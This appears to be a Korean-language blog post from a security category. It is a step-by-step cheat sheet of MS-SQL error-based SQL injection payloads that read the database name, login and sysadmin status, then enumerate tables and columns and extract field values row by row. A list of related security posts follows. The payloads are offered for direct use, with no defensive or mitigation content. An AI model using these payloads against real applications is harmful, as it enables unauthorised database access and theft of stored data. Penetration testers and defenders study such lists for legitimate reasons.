[MS-SQL Error Based SQLi]
0. 데이터베이스 조회
- ' and 1=(db_name())--
1. 사용자계정 조회 및 권한 조회
- ' and 1=(select system_user as 'login name')--
- ' and 1=(select system_user)--
- ' and quotename(is_srvrolemember('sysadmin','sa'))=0--
- ' and quotename(is_srvrolemember(0x730079007300610064006D0069006E))=0--
(결과 값이 1이면 true 0이면 false)
2. 사용자 이름 조회
- ' and 1=(user)--
- ' and 1=(select user as 'user name')--
- ' and 0<>user--
3. TABLE명 획득
- ' and 1=(select name from (select row_number() over(order by name) as rowid, name from sysobjects where xtype=0x55)T where rowid=1)--
(rowid를 증가시키면서 알아낸다)
- ' and 1=(select top 1 name from sysobjects where xtype='u')--
- ' and 1=(select top 1 name from sysobjects where xtype=char(85))--
- ' and 1=(select top 1 name from sysobjects where xtype='u' and name not in('테이블명'))--
4. 사용자 생성테이블 고유ID 조회
- ' and 1=(select id from sysobjects where xtype='u' and name='테이블명' and uid>(str(id)))--
5. 컬럼명 획득
- ' and 1=(select name from(select row_number() over(order by col.name) as rowid,col.name from sysobjects tab,syscolumns col where tab.id=col.id and tab.name='테이블명')T where rowid=1)-- (rowid 를 증가시키면서 알아낸다)
- ' and 1=(select top 1 name from syscolumns where id=테이블id)--
- ' and 1=(select top 1 name from syscolumns where id=테이블id and name not in('컬럼명'))--
6. 필드값 조회
- ' and 1=(select top 1 컬럼명 from 테이블명)--
- ' and 1=(select top 1 컬럼명 from 테이블명 where 컬럼명 not in('첫번째값'))--
'Security' 카테고리의 다른 글
| List of Apache dirs (0) | 2015.01.17 |
|---|---|
| HTTP 상태코드 (0) | 2014.11.01 |
| HTTP Parameter Pollution (0) | 2014.10.10 |
| 효과적인 Blind SQL Injection (lpad, ord, hex, bin, conv 함수를 이용한) (1) | 2014.05.31 |
| File Signature Table (0) | 2014.05.22 |
